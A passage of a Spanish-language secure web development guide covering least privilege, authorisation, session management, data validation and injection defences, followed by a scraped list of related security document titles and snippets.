acciones permitidas con su correspondiente nivel de privilegio. Controlar el acceso a recursos protegidos mediante decisiones basadas en el rol o el nivel de privilegio. Prevenir ataques de escalada de privilegios, como por ejemplo utilizar funciones administrativas siendo un usuario anónimo o incluso un usuario autenticado. Los siguientes son objetivos de control detallados por el COBIT (Objetivos de Control para Información y Tecnologías Relacionadas) Principio de menor privilegio: Las aplicaciones muchas veces se ejecutan con privilegios excesivos, dando a los usuarios demasiados privilegios sobre recursos protegidos, dejando que se ejecute la infraestructura de la aplicación con cuentas privilegiadas. Tanto los entornos de desarrollo como de pruebas deben ser configurados para funcionar con los menores privilegios posibles, así 18

19 A-RI-P01-G02 Versión : 01 Página 19 de 44 como en producción. Las cuentas de usuario deben tener únicamente los privilegios necesarios para desarrollar tareas asignadas. Listas de control de acceso: Las aplicaciones deben funcionar correctamente con los mínimos privilegios que necesiten y deben crear listas de control de acceso que reafirmen los privilegios más ajustados posibles. Para respaldar este control se debe considerar los siguientes controles de acceso: Comenzar siempre las listas de control de acceso utilizando deny all ( denegar todo ) y seguidamente ir añadiendo sólo los privilegios y roles necesarios. Controles de acceso a red: filtros basados en el host y cortafuegos Controles de acceso al sistema de ficheros: permisos en ficheros y directorios Controles de acceso de usuarios: seguridad en las plataformas de usuarios y grupos. Controles de autorización personalizados: muchas aplicaciones contienen sus propios mecanismos personalizados y propios. Esto añade complejidad y posibles fallos. A menos que exista una razón explicita de evitar las funcionalidades ya incluidas, el código debería dejar paso al soporte propio del entorno. La forma de protegerse es escribir la menor cantidad de código posible, si el código es personalizado se debe considerar los problemas de autenticación y manejo de excepciones. Rutinas de autorización centralizadas: Un error común es la de llevar a cabo una comprobación de la autorización copiando y pegando un trozo de código, o incluso peor, reescribiéndola cada vez. Las aplicaciones bien desarrolladas centralizan las rutinas de control de acceso, sobre todo las de autorización, por lo que si se encuentra algún fallo o vulnerabilidad, pueden arreglarse todas las ocurrencias sólo modificando el código una vez, aplicándose a todas las secciones al mismo tiempo. Matriz de autorización: Las aplicaciones con el acceso controlado deben realizar la comprobación de que los usuarios tengan permiso para ver una página o utilizar una acción antes de que se muestre o suceda. Para protegerse de deben utilizar las comprobaciones de seguridad integradas del propio Framework, o colocar una llamada a una comprobación centralizada de la autorización justo en la parte superior de la vista o acción. Controlando el acceso a recursos protegidos: Muchas aplicaciones realizan una comprobación para ver si tiene el permiso de realizar una acción en particular, pero no realiza la comprobación de si se permite pedir un recurso. Para esto se debe: Utilizar el código de modelo en vez del acceso directo a recursos protegidos. 19

20 A-RI-P01-G02 Versión : 01 Página 20 de 44 Asegurar que el código del modelo comprueba que el usuario autenticado tienen acceso al recurso. Asegurar que el fragmento de código que pide el recurso tiene una correcta comprobación de errores y no asume que el acceso será concedido siempre. Protegiendo el acceso a los recursos protegidos: Algunas aplicaciones generan contenido estático, y permite al servidor Web servir dicho contenido. A menudo esto implica que un informe confidencial pueda resultar disponible para usuarios no autorizados. Para protegerse se debe: Generar el contenido estático en el momento y enviarlo directamente al navegador en vez de almacenarlo en el sistema de ficheros del servidor Web Si se quiere proteger la información sensible estática, implementar comprobaciones de autorización para prevenir el acceso por parte de usuarios anónimos. Si se tiene que almacenar en disco (no recomendado), utilizar nombres de ficheros aleatorios (como por el ejemplo el GUID) y limpiar regularmente los ficheros temporales MANEJO DE SESIONES El objetivo del manejo de sesiones es asegurar que los usuarios autenticados tengan una robusta y criptográficamente segura asociación con sus sesiones. Que se hagan cumplir los controles de autorización y se prevengan los ataques web, tales como la reutilización, falsificación e intercepción de sesiones. Mejores prácticas: Las mejores prácticas requieren utilizar un robusto y bien conocido manejador de sesiones. Los marcos de aplicaciones más populares contienen una adecuada implementación. Sin embargo, las primeras versiones frecuentemente tienen debilidades significativas. Siempre utilizar la última versión de tecnología elegida, ya que su manejador de sesiones probablemente será más robusto y usara credenciales criptográficas fuertes. Ideas erróneas: una típica percepción errónea es que se utilizan altos recursos del servidor. Esto era verdad cuando los servidores se encontraban restringidos en la cantidad de RAM, pero es falso hoy en día. Otra percepción errónea es que prefieren la facilidad de programar componentes sin estado del lado del servidor. Generación permisiva de sesiones: Muchos marcos de aplicaciones web simplemente emitirán un nuevo identificador de sesión por cada solicitante en caso que no exista uno previamente. Esto se denomina generación permisiva de sesiones, y junto con algunas formas de phishing y una asociada falta de 20

21 A-RI-P01-G02 Versión : 01 Página 21 de 44 autorización, este ataque puede ser devastador. Para protegerse de este tipo de ataques debe: Cuando inicie un nuevo objeto de sesión para un usuario, asegúrese que se encuentra fuera del sistema y ningún rol haya sido otorgado. Asegúrese que cada página protegida o acción controle el estado de autenticación y autorización antes de realizar cualquier cantidad significativa de trabajo, incluyendo la generación de contenido. Asegúrese que todas las paginas desprotegidas utilicen la menor cantidad de recursos para prevenir un ataque de negación de servicio, y no facilite la fuga de información de la parte protegida de la aplicación. Variables de sesión expuestas: Algunos marcos de aplicaciones utilizan áreas compartidas del disco del servidor web para almacenar datos de la sesión. Estas áreas no proveen protección de los datos de sesión, y pueden conducir al compromiso de la aplicación si el servidor web es compartido. Para protegerse debe asegúrese que el servidor de aplicaciones sea configurado para usar áreas de ficheros temporales por cliente / aplicación. Páginas y credenciales en formularios: Las credenciales específicas de páginas pueden ser usadas en conjunto con credenciales específicas de sesión para proveer una medida de autenticidad cuando se manejan solicitudes de clientes. Utilizándolas en conjunto con mecanismos de seguridad en la capa de transporte, las credenciales de páginas pueden ayudar en asegurar que el cliente del otro lado de la sesión es de hecho el mismo cliente que ha solicitado la última página en una determinada sesión. Para protegerse debe incorporar in campo oculto con un numero aleatorio en la página o formulario criptográficamente seguro. Falsificación de sesión/detección de fuerza bruta y/o Bloqueo de sesión: Muchos sitios web tienen prohibiciones contra la adivinación de contraseñas sin embargo un atacante puede frecuentemente intentar cientos o miles de credenciales de sesión embebidas en una URL legitima o cookie sin una sola queja del sitio web. Para protegerse de estos ataques debe: Utilizar un Proxy interceptor de HTTP para manipular el identificador de sesión. Secuestro de sesión: Cuando un atacante intercepta o crea una credencial de sesión valida en el servidor, ellos pueden personificar a otro usuario. El secuestro de sesión puede ser mitigado parcialmente utilizando controles adecuados de anti-secuestro en la aplicación. El nivel de estos controles debería ser influenciado por el riesgo de la organización o los datos del cliente. Ataques de autenticación de sesión: Uno de los errores más comunes es no verificar la autorización previamente a ejecutar una función restringida o acceder información. Para protegerse siempre debe comprobar que el usuario conectado tenga la autorización necesaria para acceder, actualizar o eliminar información. 21

22 A-RI-P01-G02 Versión : 01 Página 22 de 44 Ataques de validación de sesión: Tal como cualquier información, las variables de sesión deben ser validadas para asegurar que se encuentran en forma correcta, no contienen caracteres inesperados, y que son válidas en la tabla de sesiones activas. Siempre debe comprobar que el usuario conectado tenga la autorización necesaria para acceder, actualizar o eliminar información VALIDACIÓN DE DATOS El objetivo de la validación de datos es garantizar que la aplicación sea robusta contra todas las formas de ingreso de datos, ya sea obtenida del usuario, de la infraestructura, de entidades externas o de sistemas de base de datos. Descripción: La debilidad de seguridad más común en aplicaciones web es la falta de validación apropiada de las entradas del cliente o del entorno. Esta debilidad lleva a casi todas las principales vulnerabilidades en las aplicaciones, tales como intérprete de inyección, ataques locale/unicode, ataques al sistema de archivos y desbordamientos de memoria. Definiciones: - Revisiones de integridad: Asegurar que los datos no han sido manipulados y que siguen siendo los mismos - Reglas de negocio: Garantizar que los datos no solamente sean válidos, sino que cumplas con las reglas de negocio. - Validación: Asegurar que los datos están sólidamente escritos, con la sintaxis correcta, dentro de los límites de longitud, que contenga solo caracteres permitidos, si es numérico que tenga el signo correcto y dentro de los límites del rango Donde incluir revisiones de integridad: Las revisiones de integridad deben ser incluidas en cualquier lugar en que los datos pasen de una frontera confiable a una menos confiable, tal como, de la aplicación al navegador del usuario en un campo oculto, o hacia un método de pago ofrecido por terceros, tal como un identificador utilizado internamente a su regreso. Donde incluir validación: La validación debe ser llevada a cabo en cada capa de la aplicación. Sin embargo, la validación debería llevarse a cabo en función del servidor que está ejecutando el código. Donde incluir validación de reglas de negocio: Las reglas de negocio se conocen durante el diseño e influyen durante la implementación. Sin embargo, hay enfoques malos, buenos y mejores. Frecuentemente el mejor enfoque es el más simple en términos de código. 22

23 A-RI-P01-G02 Versión : 01 Página 23 de 44 Estrategias de validación de datos: Existen cuatro estrategias para validar datos, y deberán ser utilizadas en el siguiente orden: - Aceptar buenos conocidos: Si usted espera un código postal, valide un código postal (tipo, longitud y sintaxis) - - Rechace malos conocidos. Si usted no espera ver caracteres tales como %3f o código Javascript o similares, rechace las cadenas que los contengan - Desinfectar: Elimine o traduzca caracteres (a entidades HTML o para remover comillas) en un intento por hacer que la entrada sea segura - No validar: Esto es intrínsecamente inseguro y enérgicamente desaconsejado. El negocio debe deshacerse de todos y cada uno de los casos en los que no haya validación, la falta de esta generalmente conduce directamente a la nulidad de los demás controles de seguridad en la aplicación, servidor y red. Campos ocultos: Los campos ocultos son una manera simple de evitar almacenar un estado en el servidor. Su uso es particularmente frecuente en las formas de páginas múltiples tipo asistente. Sin embargo, su uso expone el funcionamiento interno de la aplicación, así como datos para su fácil manipulación, reenvió y ataques de validación. En general, solo utilice campos ocultos para preservar la secuencia de las páginas. Cifrar URL: Los datos enviados por medio del URL, no se aconseja enérgicamente, pueden ser cifrados y descifrados. Esto reduce la posibilidad de ataques del tipo cross-site-scripting. En general, nunca envíe datos por medio de peticiones GET excepto para propósitos de navegación. Cifrar HTML: Los datos enviados al usuario deben ser seguros y él debe poder verlos. Esto se puede lograr mediante el uso de <bean:write > y similares. No utilice <%=var%> solo en el caso de que se provea un argumento a <bean:write > o similares. El cifrado de HTML traduce un rango de caracteres en entidades HTML. Por ejemplo, > se convierte en >. Esto se seguirá desplegando como > en el navegador del usuario y es una alternativa segura INTERPRETE DE INYECCIÓN Su objetivo es garantizar que las aplicaciones sean seguras de ataques de manipulación de parámetros contra intérpretes comunes. Inyección de agente de usuario: La inyección del agente de usuario es un problema bastante relevante en las aplicaciones web. No es posible controlar el escritorio del usuario, pero es parte de la ecuación de confianza. Hay varios retos que se pueden enviar para confiar en la información de entrada y envío de datos de vuelta al usuario: El navegador puede estar comprometido con software espía o Troyanos. 23

Guía de doble autenticación

Guía de doble autenticación Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.

Más detalles

Introducción a la Firma Electrónica en MIDAS

Introducción a la Firma Electrónica en MIDAS Introducción a la Firma Electrónica en MIDAS Firma Digital Introducción. El Módulo para la Integración de Documentos y Acceso a los Sistemas(MIDAS) emplea la firma digital como método de aseguramiento

Más detalles

POLITICA DE PRIVACIDAD DE LA PAGINA WEB

POLITICA DE PRIVACIDAD DE LA PAGINA WEB POLITICA DE PRIVACIDAD DE LA PAGINA WEB operamos el website de Simple Solutions.com y respetamos la privacidad de los individuos que utilizan este website. A continuación detallamos cómo utilizamos la

Más detalles

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez Seguridad en Sitios Web de Alto Tráfico Ing. Enrique Hurtarte Juárez Guatemala, 24 de Julio de 2014 XumaK Quienes somos XumaK es una empresa que fue fundada en 2003 por Marcos Andres como una de las primeras

Más detalles

Recomendaciones de Seguridad Red Social Twitter

Recomendaciones de Seguridad Red Social Twitter Recomendaciones de Seguridad Red Social Twitter Medidas de seguridad para Twitter Tras varios ataques a cuentas de reconocidas empresas, Twitter anunció nuevas medidas de seguridad. Cualquier usuario que

Más detalles

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de

Más detalles

Microsoft es una marca comercial registrada o una marca comercial de Microsoft Corporation en Estados Unidos y otros países.

Microsoft es una marca comercial registrada o una marca comercial de Microsoft Corporation en Estados Unidos y otros países. Este documento es solo para fines informativos. MICROSOFT NO OTORGA NINGUNA GARANTÍA, YA SEA EXPLÍCITA, IMPLÍCITA O LEGAL, RESPECTO DE LA INFORMACIÓN CONTENIDA EN ESTE DOCUMENTO. Este documento se entrega

Más detalles

DECLARACIÓN DE PRIVACIDAD DE FONOWEB

DECLARACIÓN DE PRIVACIDAD DE FONOWEB DECLARACIÓN DE PRIVACIDAD DE FONOWEB Fonoweb se compromete a respetar su privacidad y la confidencialidad de su información personal, los datos de las comunicaciones y el contenido de las comunicaciones

Más detalles

Resumen del trabajo sobre DNSSEC

Resumen del trabajo sobre DNSSEC Resumen del trabajo sobre Contenido 1. -...2 1.1. - Definición...2 1.2. - Seguridad basada en cifrado...2 1.3. - Cadenas de confianza...3 1.4. - Confianzas...4 1.5. - Islas de confianza...4 2. - Conclusiones...5

Más detalles

Anexo I. Politicas Generales de Seguridad del proyecto CAT

Anexo I. Politicas Generales de Seguridad del proyecto CAT Anexo I Politicas Generales de Seguridad del proyecto CAT 1 Del Puesto de Servicio. Se requiere mantener el Puesto de Servicio: a) Disponible, entendiendo por ello que el Puesto de Servicio debe estar

Más detalles

Seguridad en la red. Fuga o robo de información a causa de las siguientes razones:

Seguridad en la red. Fuga o robo de información a causa de las siguientes razones: Seguridad en la red A continuación se presentan algunos de los riesgos inherentes al medio de comunicación, cuya mitigación dependerá del uso adecuado que el suscriptor le dé a su equipo terminal móvil:

Más detalles

MANUAL DE USUARIO APLICACIÓN SYSACTIVOS

MANUAL DE USUARIO APLICACIÓN SYSACTIVOS MANUAL DE USUARIO APLICACIÓN SYSACTIVOS Autor Edwar Orlando Amaya Diaz Analista de Desarrollo y Soporte Produce Sistemas y Soluciones Integradas S.A.S Versión 1.0 Fecha de Publicación 19 Diciembre 2014

Más detalles

Política de la base datos WHOIS para nombres de dominio.eu

Política de la base datos WHOIS para nombres de dominio.eu Política de la base datos WHOIS para nombres de dominio.eu 1/7 DEFINICIONES En este documento se usan los mismos términos definidos en los Términos y Condiciones y/o las normas para la solución de controversias

Más detalles

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CONCEPTOS DE PRUEBAS DE APLICACIÓN El departamento de Testing se encarga de diseñar, planear y aplicar el rol de pruebas a los sistemas que el PROVEEDOR

Más detalles

Banco de la República Bogotá D. C., Colombia

Banco de la República Bogotá D. C., Colombia Banco de la República Bogotá D. C., Colombia Subgerencia de Informática Departamento de Seguridad Informática MANUAL DE USUARIO PARA EL SERVICIO - SISTEMA DE GESTIÓN PKI DE USUARIOS ROAMING - USI-GI-56

Más detalles

Acronis License Server. Guía del usuario

Acronis License Server. Guía del usuario Acronis License Server Guía del usuario TABLA DE CONTENIDO 1. INTRODUCCIÓN... 3 1.1 Generalidades... 3 1.2 Política de licencias... 3 2. SISTEMAS OPERATIVOS COMPATIBLES... 4 3. INSTALACIÓN DE ACRONIS LICENSE

Más detalles

Infraestructura Extendida de Seguridad IES

Infraestructura Extendida de Seguridad IES Infraestructura Extendida de Seguridad IES BANCO DE MÉXICO Dirección General de Sistemas de Pagos y Riesgos Dirección de Sistemas de Pagos INDICE 1. INTRODUCCION... 3 2. LA IES DISEÑADA POR BANCO DE MÉXICO...

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

Manual del usuario del Módulo de Administración de Privilegios del Sistema Ingresador (MAPSI)

Manual del usuario del Módulo de Administración de Privilegios del Sistema Ingresador (MAPSI) Manual del usuario del Módulo de Administración de Privilegios del Sistema Ingresador (MAPSI) 1. Introducción El presente manual representa una guía rápida que ilustra la utilización del Módulo de Administración

Más detalles

ADMINISTRACIÓN DE BASES DE DATOS DISTRIBUIDAS

ADMINISTRACIÓN DE BASES DE DATOS DISTRIBUIDAS 5 ADMINISTRACIÓN DE BASES DE DATOS DISTRIBUIDAS Contenido: 5.1 Conceptos Generales Administración de Bases de Datos Distribuidas 5.1.1 Administración la Estructura de la Base de Datos 5.1.2 Administración

Más detalles

PROPÓSITO... 2 DETERMINANTES PARA UNA BUENA EXPERIENCIA DE USO...

PROPÓSITO... 2 DETERMINANTES PARA UNA BUENA EXPERIENCIA DE USO... Tabla de Contenido PROPÓSITO... 2 DETERMINANTES PARA UNA BUENA EXPERIENCIA DE USO... 2 1. LA PRESENCIA DE INFORMACIÓN Y AYUDA ÚTIL PARA COMPLETAR LOS TRÁMITES EN LÍNEA.... 2 2. LA DISPONIBILIDAD DE DIVERSOS

Más detalles

Creación y administración de cuentas de usuario locales

Creación y administración de cuentas de usuario locales Creación y administración de cuentas de usuario locales Contenido Descripción general 1 Introducción a las cuentas de usuario 2 Cuentas de usuario locales 3 Directrices para nuevas cuentas de usuario 5

Más detalles

SEGURIDAD Y PROTECCION DE FICHEROS

SEGURIDAD Y PROTECCION DE FICHEROS SEGURIDAD Y PROTECCION DE FICHEROS INTEGRIDAD DEL SISTEMA DE ARCHIVOS ATAQUES AL SISTEMA PRINCIPIOS DE DISEÑO DE SISTEMAS SEGUROS IDENTIFICACIÓN DE USUARIOS MECANISMOS DE PROTECCIÓN Y CONTROL INTEGRIDAD

Más detalles

PROGRAMACIÓN ORIENTADA A OBJETOS Master de Computación. II MODELOS y HERRAMIENTAS UML. II.2 UML: Modelado de casos de uso

PROGRAMACIÓN ORIENTADA A OBJETOS Master de Computación. II MODELOS y HERRAMIENTAS UML. II.2 UML: Modelado de casos de uso PROGRAMACIÓN ORIENTADA A OBJETOS Master de Computación II MODELOS y HERRAMIENTAS UML 1 1 Modelado de casos de uso (I) Un caso de uso es una técnica de modelado usada para describir lo que debería hacer

Más detalles

Transport Layer Security (TLS) Acerca de TLS

Transport Layer Security (TLS) Acerca de TLS Transport Layer Security (TLS) Acerca de TLS Contenido Correo electrónico seguro en HSBC... 2 Acerca de Transport Layer Security..... 2 Para establecer una conexión Forced TLS con HSBC... 4 Glosario...

Más detalles

POLÍTICA DE PRIVACIDAD PARA APLICACIONES MÓVILES GRUPOCOPESA. 1. información que se obtiene la aplicación y su utilización

POLÍTICA DE PRIVACIDAD PARA APLICACIONES MÓVILES GRUPOCOPESA. 1. información que se obtiene la aplicación y su utilización POLÍTICA DE PRIVACIDAD PARA APLICACIONES MÓVILES GRUPOCOPESA Nuestra política de privacidad se aplica al uso de las aplicaciones informáticas de los siguientes medios de comunicación: LaTercera, LaCuarta,

Más detalles

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)

Más detalles

Un sistema adecuadamente refrigerado debe mantener una temperatura de 90 110 grados.

Un sistema adecuadamente refrigerado debe mantener una temperatura de 90 110 grados. Informáticas I 2. Protección de información y Hardware Debemos tomar medidas cuando usar computadoras no sólo para mantener nuestros archivos e identidad fuerte y segura, sino también nuestros equipos.

Más detalles

Guía de instalación de la carpeta Datos de IslaWin

Guía de instalación de la carpeta Datos de IslaWin Guía de instalación de la carpeta Datos de IslaWin Para IslaWin Gestión CS, Classic o Pyme a partir de la revisión 7.00 (Revisión: 10/11/2011) Contenido Introducción... 3 Acerca de este documento... 3

Más detalles

Seguridad en la transmisión de Datos

Seguridad en la transmisión de Datos Seguridad en la transmisión de Datos David Peg Montalvo Santiago de Compostela Noviembre 2005 Índice 01 Seguridad. Ámbito de aplicación 02 Control de acceso 03 Conceptos básicos de criptografía 04 PKI

Más detalles

SEMANA 12 SEGURIDAD EN UNA RED

SEMANA 12 SEGURIDAD EN UNA RED SEMANA 12 SEGURIDAD EN UNA RED SEGURIDAD EN UNA RED La seguridad, protección de los equipos conectados en red y de los datos que almacenan y comparten, es un hecho muy importante en la interconexión de

Más detalles

En el artículo del mes pasado,

En el artículo del mes pasado, 144 UNE ISO/IEC 27001: 2005 & LOPD (II) EN ESTE NÚMERO PRESENTAMOS LA TABLA COMPLETA, EN LA CUAL SE RELACIONAN TODOS LOS S DE ESTE NUEVO REGLAMENTO Alejandro Corletti DIRECTOR DIVISIÓN SEGURIDAD INFORMÁTICA

Más detalles

Resumen de los protocolos de seguridad del Registro Telemático

Resumen de los protocolos de seguridad del Registro Telemático Resumen de los protocolos de seguridad del Registro Telemático Página 1 de 8 1 Introducción... 3 2 Criterios de... 4 2.1 Gestión global de la seguridad... 4 2.2 Política de seguridad... 4 2.2.1 Autenticidad...

Más detalles

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA

Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Documento de trabajo elaborado para la Red Temática DocenWeb: Red Temática de Docencia en Control mediante Web (DPI2002-11505-E)

Más detalles

MANUAL COPIAS DE SEGURIDAD

MANUAL COPIAS DE SEGURIDAD MANUAL COPIAS DE SEGURIDAD Índice de contenido Ventajas del nuevo sistema de copia de seguridad...2 Actualización de la configuración...2 Pantalla de configuración...3 Configuración de las rutas...4 Carpeta

Más detalles

Programación páginas web. Servidor (PHP)

Programación páginas web. Servidor (PHP) Programación páginas web. Servidor (PHP) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos MySQL.

Más detalles

Gestió n de Certificadó Digital

Gestió n de Certificadó Digital Gestió n de Certificadó Digital Contenido Introducción... 2 Exportar certificado... 5 Importar certificado... 8 Renovar el Certificado... 10 1 Introducción Los certificados digitales o certificados de

Más detalles

Creación y administración de grupos locales

Creación y administración de grupos locales Creación y administración de grupos locales Contenido Descripción general 1 Introducción a los grupos de Windows 2000 2 Grupos locales 5 Grupos locales integrados 7 Estrategia para utilizar grupos locales

Más detalles

Haga clic para modificar el estilo de título del patrón Haga clic para modificar el estilo de texto del patrón

Haga clic para modificar el estilo de título del patrón Haga clic para modificar el estilo de texto del patrón texto del DESAFÍOS PARA ALCANZAR EL CUMPLIMIENTO: GUÍA DE IMPLEMENTACIÓN, INTEGRACIÓN DE LA SEGURIDAD EN EL CICLO DE VIDA DEL SOFTWARE, LABORATORIO PCI DSS COMPLIANT. FERMÍN GARDE FERNÁNDEZ RESPONSABLE

Más detalles

Maxpho Commerce 11. Gestión CSV. Fecha: 20 Septiembre 2011 Versión : 1.1 Autor: Maxpho Ltd

Maxpho Commerce 11. Gestión CSV. Fecha: 20 Septiembre 2011 Versión : 1.1 Autor: Maxpho Ltd Maxpho Commerce 11 Gestión CSV Fecha: 20 Septiembre 2011 Versión : 1.1 Autor: Maxpho Ltd Índice general 1 - Introducción... 3 1.1 - El archivo CSV... 3 1.2 - Módulo CSV en Maxpho... 3 1.3 - Módulo CSV

Más detalles

LiLa Portal Guía para profesores

LiLa Portal Guía para profesores Library of Labs Lecturer s Guide LiLa Portal Guía para profesores Se espera que los profesores se encarguen de gestionar el aprendizaje de los alumnos, por lo que su objetivo es seleccionar de la lista

Más detalles

Visión General de GXportal. Última actualización: 2009

Visión General de GXportal. Última actualización: 2009 Última actualización: 2009 Copyright Artech Consultores S. R. L. 1988-2009. Todos los derechos reservados. Este documento no puede ser reproducido en cualquier medio sin el consentimiento explícito de

Más detalles

Enkarga.com LLC. Política de privacidad

Enkarga.com LLC. Política de privacidad Enkarga.com LLC. Política de privacidad Esta declaración de privacidad explica qué información recopilamos de usted se utiliza al ordenar productos Enkarga.com LLC y cuando usted visita nuestros sitios.

Más detalles

CONCEPTOS GENERALES SOBRE SEGURIDAD INFORMATICA

CONCEPTOS GENERALES SOBRE SEGURIDAD INFORMATICA CONCEPTOS GENERALES SOBRE SEGURIDAD INFORMATICA Hoy en día las redes de comunicaciones son cada vez mas importantes para las organizaciones ya que depende de estás, para que exista un manejo adecuado de

Más detalles

Autenticación Centralizada

Autenticación Centralizada Autenticación Centralizada Ing. Carlos Rojas Castro Herramientas de Gestión de Redes Introducción En el mundo actual, pero en especial las organizaciones actuales, los usuarios deben dar pruebas de quiénes

Más detalles

TECNOLOGIAS DE INFORMACION GUBERNAMENTAL OFICINA DE GERENCIA Y PRESUPUESTO

TECNOLOGIAS DE INFORMACION GUBERNAMENTAL OFICINA DE GERENCIA Y PRESUPUESTO TECNOLOGIAS DE INFORMACION GUBERNAMENTAL OFICINA DE GERENCIA Y PRESUPUESTO POLITICA NÚM. TIG-003 FECHA DE EFECTIVIDAD: 15 de diciembre de 2004 FECHA DE REVISIÓN: 12 de septiembre de 2007 TEMA: SEGURIDAD

Más detalles

Oasis es una fábrica para el bien común de los datos mediante la utilización de aplicaciones propuestas.

Oasis es una fábrica para el bien común de los datos mediante la utilización de aplicaciones propuestas. 1. Manual de usuario 1.1 Esquema de Oasis Oasis es una fábrica para el bien común de los datos mediante la utilización de aplicaciones propuestas. Gracias a OASIS usted podrá comprar o seleccionar aplicaciones

Más detalles

POLITICA DE PRIVACIDAD. www.tuboleta.com

POLITICA DE PRIVACIDAD. www.tuboleta.com http://vive.tuboleta.com/content/privatepolicy.aspx POLITICA DE PRIVACIDAD Tu Boleta respeta la privacidad de todos sus clientes y contactos comerciales, y está comprometido a salvaguardar la información

Más detalles

Instructivo Asignación y Cambio de clave para el ingreso de usuarios HQ-RUNT

Instructivo Asignación y Cambio de clave para el ingreso de usuarios HQ-RUNT Página: 1 de 25 APROBACIONES Elaborado por: Carol Beltrán Aprobado por: Cesar Godoy Cargo: Coordinador de Cargo: Gerente de Operaciones Revisado por: Cesar Godoy Fecha de elaboración: 17-11-2010 Cargo:

Más detalles

Bloquean el tráfico basándose en un esquema de aplicaciones fiables - no fiables.

Bloquean el tráfico basándose en un esquema de aplicaciones fiables - no fiables. CORTAFUEGOS: Son programas que nos ayudan a controlar las conexiones que puede iniciar o recibir un ordenador conectado a la red. También nos protegen de intrusiones no deseadas, evita que la información

Más detalles

Introducción. Ciclo de vida de los Sistemas de Información. Diseño Conceptual

Introducción. Ciclo de vida de los Sistemas de Información. Diseño Conceptual Introducción Algunas de las personas que trabajan con SGBD relacionales parecen preguntarse porqué deberían preocuparse del diseño de las bases de datos que utilizan. Después de todo, la mayoría de los

Más detalles

ISO 27001- Anexo A OBJETIVOS DE CONTROL Y CONTROLES DE REFERENCIA DANIELA RAMIREZ PEÑARANDA 1150453 WENDY CARRASCAL VILLAMIZAR 1150458

ISO 27001- Anexo A OBJETIVOS DE CONTROL Y CONTROLES DE REFERENCIA DANIELA RAMIREZ PEÑARANDA 1150453 WENDY CARRASCAL VILLAMIZAR 1150458 ISO 27001- Anexo A OBJETIVOS DE CONTROL Y CONTROLES DE REFERENCIA DANIELA RAMIREZ PEÑARANDA 1150453 WENDY CARRASCAL VILLAMIZAR 1150458 UNIVERSIDAD FRANCISCO DE PAULA SANTANDER INGENIERIA DE SISTEMAS SEGURIDAD

Más detalles

Cloud Security Alliance, Inc. (CSA) se atiene a los siguientes principios en relación al manejo de información personal en formato electrónico:

Cloud Security Alliance, Inc. (CSA) se atiene a los siguientes principios en relación al manejo de información personal en formato electrónico: Cloud Security Alliance Política de Privacidad Cloud Security Alliance, Inc. (CSA) se atiene a los siguientes principios en relación al manejo de información personal en formato electrónico: La información

Más detalles

GESTIÓN DOCUMENTAL PARA EL SISTEMA DE CALIDAD

GESTIÓN DOCUMENTAL PARA EL SISTEMA DE CALIDAD GESTIÓN DOCUMENTAL PARA EL SISTEMA DE CALIDAD Manual de usuario 1 - ÍNDICE 1 - ÍNDICE... 2 2 - INTRODUCCIÓN... 3 3 - SELECCIÓN CARPETA TRABAJO... 4 3.1 CÓMO CAMBIAR DE EMPRESA O DE CARPETA DE TRABAJO?...

Más detalles

Capítulo 5. Cliente-Servidor.

Capítulo 5. Cliente-Servidor. Capítulo 5. Cliente-Servidor. 5.1 Introducción En este capítulo hablaremos acerca de la arquitectura Cliente-Servidor, ya que para nuestra aplicación utilizamos ésta arquitectura al convertir en un servidor

Más detalles

Para obtener una cuenta de padre

Para obtener una cuenta de padre Orientación de Calificaciones Portal Padres Temas Principales Características Para obtener una Cuenta de Padres Lineamientos sobre el uso Manejo de la Cuenta Información de apoyo Calificaciones en Portal

Más detalles

Seguridad del Protocolo HTTP

Seguridad del Protocolo HTTP Seguridad del Protocolo HTTP - P R O T O C O L O H T T P S. - C O N E X I O N E S S E G U R A S : S S L, TS L. - G E S T IÓN D E C E R T IF I C A D O S Y A C C E S O --S E G U R O C O N H T T P S Luis

Más detalles

SIEWEB. La intranet corporativa de SIE

SIEWEB. La intranet corporativa de SIE La intranet corporativa de SIE por ALBA Software Acceso a los servicios SIE desde páginas Web para los usuarios de sistema *. Administración del Sistema (cuentas de usuarios, permisos, servicios, etc...)

Más detalles

PRUEBAS DE SOFTWARE TECNICAS DE PRUEBA DE SOFTWARE

